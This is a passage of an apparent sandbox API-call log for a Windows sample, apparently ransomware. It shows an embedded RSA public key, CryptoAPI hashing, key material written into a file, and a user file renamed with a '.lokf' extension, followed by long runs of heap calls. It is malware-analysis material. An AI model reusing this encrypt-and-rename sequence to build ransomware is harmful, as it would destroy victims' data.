KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.269] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.269] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.269] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.269] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.269] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.269] GetLastError () returned 0x0 [0060.269] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.270] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.270] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.270] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.270] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.270] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.270] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.270] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.271] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.271] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.271] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.271] CloseHandle (hObject=0x5cc) returned 1 [0060.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0060.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.272] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.lokf")) returned 1 [0060.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.272] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.273] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0060.273] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.274] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.274] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 